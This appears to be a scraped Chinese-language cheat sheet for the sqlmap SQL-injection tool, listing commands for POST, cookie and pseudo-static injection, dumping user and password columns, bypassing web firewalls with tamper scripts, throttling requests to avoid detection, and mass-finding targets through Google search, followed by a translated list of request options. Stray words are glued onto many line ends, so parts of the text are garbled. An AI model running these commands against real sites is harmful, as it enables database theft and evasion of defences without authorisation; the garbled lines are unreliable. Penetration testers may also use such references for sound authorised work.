sqlmapphp
SqlMap POST注入html
自動檢測
sqlmap -u 「http://www.xxx.com/news?id=1″ –smart –level 3 –users正則表達式
單個注入
sqlmap -u 「http://www.xxx.com/1.php」 –data=」id=1″sql
多個post值注入
sqlmap -u 「http://www.xxx.com/vuln.php」 –data=」query=foobar;id=1″ –param-del=」;」 -f –banner –dbs –userscookie
自動注入
sqlmap -u http://xxxx.xxxx.com/Login.asp –formsdom
導入文件注入
sqlmap -r key.txt 「name,pass」 //不知道 key.txt 的位置post
登陸post註冊測試
sqlmap -u 「http://www.xxx.com/vuln.php」 –data=」query=foobar;id=1″ –param-del=」;」 –cookies=」登陸成功的cookie信息」 -f –banner –dbs –users編碼
SqlMap COOkie 注入url
單個注入
sqlmap 「http://127.0.0.1/base.php」 –cookie 「id=1″ –dbs –level 2
sqlmap -u 「url」 –cookie 「id=」 –clumns -T 表段 –level 2
sqlmap -u 「url」 –cookie 「id=」 –dump -T 表段 -C 「user,pass」 –level 2
僞靜態注入:
sqlmap -u url/x*.html –dbs
請求延時注入:
sqlmap –dbs -u usr/x*.html –delay 1(時間,可隨意)
sqlmap –dbs -u usr/x*.html –safe-freq 1(次數,可隨意)
————————————————————————–
繞過WAF防火牆:
sqlmap -u url -v 3 –dbs –batch –tamper 「space2morehash.py」
1.space2hash.py 2.base64encode.py 3.charencode.py
————————————————————————–
Google批量檢測注入:
sqlmap -g 關鍵詞
Request(請求)::
這些選項能夠用來指定如何鏈接到目標URL。
–data=DATA 經過POST發送的數據字符串–cookie=COOKIE HTTP Cookie頭–cookie-urlencode URL 編碼生成的cookie注入–drop-set-cookie 忽略響應的Set – Cookie頭信息–user-agent=AGENT 指定 HTTP User – Agent頭–random-agent 使用隨機選定的HTTP User – Agent頭–referer=REFERER 指定 HTTP Referer頭–headers=HEADERS 換行分開,加入其餘的HTTP頭–auth-type=ATYPE HTTP身份驗證類型(基本,摘要或NTLM)(Basic, Digest or NTLM)–auth-cred=ACRED HTTP身份驗證憑據(用戶名:密碼)–auth-cert=ACERT HTTP認證證書(key_file,cert_file)–proxy=PROXY 使用HTTP代理鏈接到目標URL–proxy-cred=PCRED HTTP代理身份驗證憑據(用戶名:密碼)–ignore-proxy 忽略系統默認的HTTP代理–delay=DELAY 在每一個HTTP請求之間的延遲時間,單位爲秒–timeout=TIMEOUT 等待鏈接超時的時間(默認爲30秒)–retries=RETRIES 鏈接超時後從新鏈接的時間(默認3)–scope=SCOPE 從所提供的代理日誌中過濾器目標的正則表達式–safe-url=SAFURL 在測試過程當中常常訪問的url地址